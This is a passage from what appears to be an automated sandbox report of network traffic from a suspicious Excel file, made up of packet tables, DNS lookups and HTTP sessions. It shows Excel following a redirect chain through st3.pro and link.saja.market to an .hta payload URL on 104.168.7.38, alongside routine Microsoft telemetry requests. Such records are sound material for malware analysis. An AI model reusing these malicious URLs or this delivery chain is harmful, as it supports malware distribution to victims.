                                                                    Mar 12, 2025 18:36:04.321297884 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:04.321381092 CET49707443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:04.321388006 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:04.321424961 CET49707443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:04.331670046 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:04.331691980 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:04.331757069 CET49707443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:04.331763983 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:04.331855059 CET49707443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:04.332899094 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:04.332917929 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:04.332988977 CET49707443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:04.332994938 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:04.333074093 CET49707443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:04.340131044 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:04.340158939 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:04.340200901 CET49707443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:04.340208054 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:04.340225935 CET49707443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:04.340253115 CET49707443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:04.340260029 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:04.340276003 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:04.340516090 CET49707443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:04.340533972 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:04.340544939 CET49707443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:04.340544939 CET49707443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:04.340553999 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:04.340562105 CET4434970713.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:07.828268051 CET49709443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:07.828320026 CET4434970913.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:07.828459978 CET49709443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:07.828679085 CET49709443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:07.828691959 CET4434970913.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:07.830949068 CET49710443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:07.830998898 CET4434971013.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:07.831051111 CET49710443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:07.831199884 CET49710443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:07.831214905 CET4434971013.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:09.911540985 CET4434970913.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:09.912110090 CET49709443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:09.912134886 CET4434970913.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:09.913009882 CET49709443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:09.913017988 CET4434970913.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:09.982496023 CET4434971013.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:09.983027935 CET49710443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:09.983048916 CET4434971013.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:09.983881950 CET49710443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:09.983886957 CET4434971013.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:10.422518015 CET4434970913.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:10.422590017 CET4434970913.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:10.422744036 CET49709443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:10.422935009 CET49709443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:10.422935009 CET49709443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:10.422955036 CET4434970913.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:10.422966003 CET4434970913.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:10.485162973 CET4434971013.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:10.485184908 CET4434971013.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:10.485244036 CET4434971013.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:10.485311031 CET49710443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:10.485361099 CET49710443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:10.485627890 CET49710443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:10.485656023 CET4434971013.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:10.485671043 CET49710443192.168.2.713.107.246.60
                                                                    Mar 12, 2025 18:36:10.485680103 CET4434971013.107.246.60192.168.2.7
                                                                    Mar 12, 2025 18:36:27.922003984 CET4969980192.168.2.7104.168.7.38
                                                                    Mar 12, 2025 18:36:27.926846027 CET8049699104.168.7.38192.168.2.7
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Mar 12, 2025 18:35:29.157970905 CET5361453192.168.2.71.1.1.1
                                                                    Mar 12, 2025 18:35:29.171225071 CET53536141.1.1.1192.168.2.7
                                                                    Mar 12, 2025 18:35:31.452990055 CET4977053192.168.2.71.1.1.1
                                                                    Mar 12, 2025 18:35:31.489237070 CET53497701.1.1.1192.168.2.7
                                                                    Mar 12, 2025 18:35:44.427639961 CET5811453192.168.2.71.1.1.1
                                                                    Mar 12, 2025 18:35:44.453104973 CET53581141.1.1.1192.168.2.7
                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                    Mar 12, 2025 18:35:29.157970905 CET192.168.2.71.1.1.10x830eStandard query (0)st3.proA (IP address)IN (0x0001)false
                                                                    Mar 12, 2025 18:35:31.452990055 CET192.168.2.71.1.1.10xe8a0Standard query (0)link.saja.marketA (IP address)IN (0x0001)false
                                                                    Mar 12, 2025 18:35:44.427639961 CET192.168.2.71.1.1.10x1d79Standard query (0)otelrules.svc.static.microsoftA (IP address)IN (0x0001)false
                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                    Mar 12, 2025 18:34:42.168464899 CET1.1.1.1192.168.2.70xe7edNo error (0)ecs-office.s-0005.dual-s-msedge.nets-0005.dual-s-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 12, 2025 18:34:42.168464899 CET1.1.1.1192.168.2.70xe7edNo error (0)s-0005.dual-s-msedge.net52.123.129.14A (IP address)IN (0x0001)false
                                                                    Mar 12, 2025 18:34:42.168464899 CET1.1.1.1192.168.2.70xe7edNo error (0)s-0005.dual-s-msedge.net52.123.128.14A (IP address)IN (0x0001)false
                                                                    Mar 12, 2025 18:34:44.496404886 CET1.1.1.1192.168.2.70xc8b4No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                    Mar 12, 2025 18:34:44.496404886 CET1.1.1.1192.168.2.70xc8b4No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                    Mar 12, 2025 18:35:29.171225071 CET1.1.1.1192.168.2.70x830eNo error (0)st3.pro5.161.200.29A (IP address)IN (0x0001)false
                                                                    Mar 12, 2025 18:35:31.489237070 CET1.1.1.1192.168.2.70xe8a0No error (0)link.saja.marketistio.saja.marketCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 12, 2025 18:35:31.489237070 CET1.1.1.1192.168.2.70xe8a0No error (0)istio.saja.marketservice-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 12, 2025 18:35:31.489237070 CET1.1.1.1192.168.2.70xe8a0No error (0)service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.com3.39.89.152A (IP address)IN (0x0001)false
                                                                    Mar 12, 2025 18:35:31.489237070 CET1.1.1.1192.168.2.70xe8a0No error (0)service-eks-nlb-public-0b7cb0a32741e125.elb.ap-northeast-2.amazonaws.com3.39.153.44A (IP address)IN (0x0001)false
                                                                    Mar 12, 2025 18:35:44.453104973 CET1.1.1.1192.168.2.70x1d79No error (0)otelrules.svc.static.microsoftotelrules-bzhndjfje8dvh5fd.z01.azurefd.netCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 12, 2025 18:35:44.453104973 CET1.1.1.1192.168.2.70x1d79No error (0)otelrules-bzhndjfje8dvh5fd.z01.azurefd.netstar-azurefd-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 12, 2025 18:35:44.453104973 CET1.1.1.1192.168.2.70x1d79No error (0)star-azurefd-prod.trafficmanager.netshed.dual-low.s-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 12, 2025 18:35:44.453104973 CET1.1.1.1192.168.2.70x1d79No error (0)shed.dual-low.s-part-0032.t-0009.t-msedge.nets-part-0032.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                    Mar 12, 2025 18:35:44.453104973 CET1.1.1.1192.168.2.70x1d79No error (0)s-part-0032.t-0009.t-msedge.net13.107.246.60A (IP address)IN (0x0001)false
                                                                    Mar 12, 2025 18:35:46.549302101 CET1.1.1.1192.168.2.70x25baNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                    Mar 12, 2025 18:35:46.549302101 CET1.1.1.1192.168.2.70x25baNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                    • st3.pro
                                                                    • link.saja.market
                                                                    • otelrules.svc.static.microsoft
                                                                    • 104.168.7.38
                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.749699104.168.7.38806620C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                    TimestampBytes transferredDirectionData
                                                                    Mar 12, 2025 18:35:34.742419004 CET244OUTGET /xampp/kcheck/nicebrazilpeopleskissingbestformylips.hta HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                    Connection: Keep-Alive
                                                                    Host: 104.168.7.38
                                                                    Mar 12, 2025 18:35:35.236979961 CET539INHTTP/1.1 404 Not Found
                                                                    Date: Wed, 12 Mar 2025 17:35:34 GMT
                                                                    Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                                    Content-Length: 298
                                                                    Keep-Alive: timeout=5, max=100
                                                                    Connection: Keep-Alive
                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 38 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 33 2e 31 2e 33 20 50 48 50 2f 38 2e 31 2e 32 35 20 53 65 72 76 65 72 20 61 74 20 31 30 34 2e 31 36 38 2e 37 2e 33 38 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25 Server at 104.168.7.38 Port 80</address></body></html>


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    0192.168.2.7496975.161.200.294436620C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-03-12 17:35:30 UTC259OUTGET /3vyHqs9?&hide=direful&pension=terrible&outcome=idiotic&ranch=famous&loafer HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                    Host: st3.pro
                                                                    Connection: Keep-Alive
                                                                    2025-03-12 17:35:31 UTC461INHTTP/1.1 302 Found
                                                                    Content-Length: 101
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Date: Wed, 12 Mar 2025 17:35:31 GMT
                                                                    Location: https://link.saja.market/TPaIk0mILV?&offence=funny&wrap=axiomatic&advertisement
                                                                    Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                                    Vary: Accept
                                                                    X-Content-Type-Options: nosniff
                                                                    X-Dns-Prefetch-Control: off
                                                                    X-Download-Options: noopen
                                                                    X-Frame-Options: SAMEORIGIN
                                                                    X-Xss-Protection: 1; mode=block
                                                                    Connection: close
                                                                    2025-03-12 17:35:31 UTC101INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 6c 69 6e 6b 2e 73 61 6a 61 2e 6d 61 72 6b 65 74 2f 54 50 61 49 6b 30 6d 49 4c 56 3f 26 6f 66 66 65 6e 63 65 3d 66 75 6e 6e 79 26 77 72 61 70 3d 61 78 69 6f 6d 61 74 69 63 26 61 64 76 65 72 74 69 73 65 6d 65 6e 74
                                                                    Data Ascii: Found. Redirecting to https://link.saja.market/TPaIk0mILV?&offence=funny&wrap=axiomatic&advertisement


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    1192.168.2.7496983.39.89.1524436620C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-03-12 17:35:34 UTC248OUTGET /TPaIk0mILV?&offence=funny&wrap=axiomatic&advertisement HTTP/1.1
                                                                    Accept: */*
                                                                    Accept-Encoding: gzip, deflate
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                    Connection: Keep-Alive
                                                                    Host: link.saja.market
                                                                    2025-03-12 17:35:34 UTC510INHTTP/1.1 302 Found
                                                                    Date: Wed, 12 Mar 2025 17:35:34 GMT
                                                                    Content-Type: text/plain; charset=utf-8
                                                                    Content-Length: 96
                                                                    Connection: close
                                                                    x-dns-prefetch-control: off
                                                                    x-frame-options: SAMEORIGIN
                                                                    strict-transport-security: max-age=15552000; includeSubDomains
                                                                    x-download-options: noopen
                                                                    x-content-type-options: nosniff
                                                                    x-xss-protection: 1; mode=block
                                                                    location: http://104.168.7.38/xampp/kcheck/nicebrazilpeopleskissingbestformylips.hta
                                                                    vary: Accept
                                                                    x-envoy-upstream-service-time: 7
                                                                    server: istio-envoy
                                                                    2025-03-12 17:35:34 UTC96INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 31 30 34 2e 31 36 38 2e 37 2e 33 38 2f 78 61 6d 70 70 2f 6b 63 68 65 63 6b 2f 6e 69 63 65 62 72 61 7a 69 6c 70 65 6f 70 6c 65 73 6b 69 73 73 69 6e 67 62 65 73 74 66 6f 72 6d 79 6c 69 70 73 2e 68 74 61
                                                                    Data Ascii: Found. Redirecting to http://104.168.7.38/xampp/kcheck/nicebrazilpeopleskissingbestformylips.hta


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    2192.168.2.74970113.107.246.604436620C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-03-12 17:35:50 UTC226OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                    Host: otelrules.svc.static.microsoft


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    3192.168.2.74970513.107.246.604436620C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-03-12 17:35:52 UTC214OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                    Host: otelrules.svc.static.microsoft
                                                                    2025-03-12 17:35:53 UTC471INHTTP/1.1 200 OK
                                                                    Date: Wed, 12 Mar 2025 17:35:53 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 474
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                    ETag: "0x8DC582B9964B277"
                                                                    x-ms-request-id: 47e628cc-501e-008c-4975-93cd39000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20250312T173553Z-17846f7ff658jg85hC1BL1h4y80000000ckg000000016nyh
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_MISS
                                                                    Accept-Ranges: bytes
                                                                    2025-03-12 17:35:53 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    4192.168.2.74970413.107.246.604436620C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-03-12 17:35:52 UTC214OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                    Host: otelrules.svc.static.microsoft
                                                                    2025-03-12 17:35:53 UTC491INHTTP/1.1 200 OK
                                                                    Date: Wed, 12 Mar 2025 17:35:53 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 408
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                    ETag: "0x8DC582BB56D3AFB"
                                                                    x-ms-request-id: a35f3f1a-201e-0033-0105-92b167000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20250312T173553Z-r16856dc8582jx6nhC1BL1hee40000000aag000000017tqn
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2025-03-12 17:35:53 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    5192.168.2.74970313.107.246.604436620C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-03-12 17:35:53 UTC214OUTGET /rules/rule120600v5s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                    Host: otelrules.svc.static.microsoft
                                                                    2025-03-12 17:35:53 UTC515INHTTP/1.1 200 OK
                                                                    Date: Wed, 12 Mar 2025 17:35:53 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 3870
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 19 Nov 2024 13:00:34 GMT
                                                                    ETag: "0x8DD089A27B58D5A"
                                                                    x-ms-request-id: c747dd45-801e-00a0-12cc-922196000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20250312T173553Z-r16856dc8589vj8ghC1BL1ma6w00000003ug000000015rud
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2025-03-12 17:35:53 UTC3870INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="5" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    6192.168.2.74970713.107.246.604431220C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                    TimestampBytes transferredDirectionData
                                                                    2025-03-12 17:36:02 UTC226OUTGET /rules/excel.exe-Production-v19.bundle HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.16827; Pro)
                                                                    Host: otelrules.svc.static.microsoft
                                                                    2025-03-12 17:36:03 UTC493INHTTP/1.1 200 OK
                                                                    Date: Wed, 12 Mar 2025 17:36:03 GMT
                                                                    Content-Type: text/plain
                                                                    Content-Length: 1114783
                                                                    Connection: close
                                                                    Vary: Accept-Encoding
                                                                    Cache-Control: public
                                                                    Last-Modified: Mon, 10 Mar 2025 13:15:17 GMT
                                                                    ETag: "0x8DD5FD59A686EBF"
                                                                    x-ms-request-id: 8098c8e9-401e-0016-6929-9253e0000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20250312T173602Z-17846f7ff658jg85hC1BL1h4y80000000cr000000000bn0h
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2025-03-12 17:36:03 UTC15891INData Raw: 31 30 30 30 34 32 76 32 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 34 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 55 58 2e 44 65 73 6b 74 6f 70 2e 4f 66 66 69 63 65 54 68 65 6d 65 2e 41 70 70 2e 49 6e 69 74 22 20 41 54 54 3d 22 63 34 33 38 38 63 39 37 37 32 39 37 34 31 33 62 62 30 35 34 62 61 64 31 61 63 66 30 61 64 65 31 2d 63 63 35 38 65 35 33 65 2d 66 35 61 34 2d 34 66 33 37 2d 62 30 64 32 2d 39 61 38 30 37 39 65 33 34 34 32 30 2d 36 38 37 39 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 63 6d 39 79 35
                                                                    Data Ascii: 100042v2+<?xml version="1.0" encoding="utf-8"?><R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="cm9y5
